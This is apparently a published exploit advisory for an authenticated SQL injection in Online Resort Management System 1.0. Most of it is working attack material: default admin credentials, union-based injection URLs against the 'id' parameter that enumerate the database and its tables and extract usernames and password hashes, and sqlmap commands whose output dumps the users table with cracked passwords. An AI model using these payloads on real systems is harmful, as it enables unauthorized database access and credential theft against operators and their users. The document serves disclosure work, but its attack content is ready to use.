# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated) # Date: 15/01/2022 # Exploit Author: Gaurav Grover # Vendor Homepage: # Software Link: # Version: 1.0 # Tested on: Linux and windows both Summary: There are a vulnerabilities in Online Resort Management System (ORMS) 1. The attacker can easily retrieved the database using sql injection. Proof of concepts : Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below: 1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id= 2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+ 3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+ 4. (Database Name :- orms_db) Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+ 5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+ 6. (Username Password :- User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below: 1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs available databases [8]: [*] clinic_db [*] information_schema [*] mtms_db [*] mysql [*] orms_db [*] performance_schema [*] phpmyadmin [*] test 2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables Database: mtms [6 tables] +------------------+ | activity_list | | message_list | | reservation_list | | room_list | | system_info | | users | +------------------+ 3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump Database: orms_db Table: users [2 entries] +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ | id | type | status | avatar | username | lastname | password | firstname | middlename | last_login | date_added | date_updated | +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ | 1 | 1 | 1 | uploads/avatar-1.png?v=1639468007 | admin | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL | NULL | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 | | 5 | 2 | 1 | uploads/avatar-5.png?v=1641622906 | cblake1 | Blake | cd74fae0a3adf459f73bbf187607ccea (cblake) | Claire | NULL | NULL | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 | +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+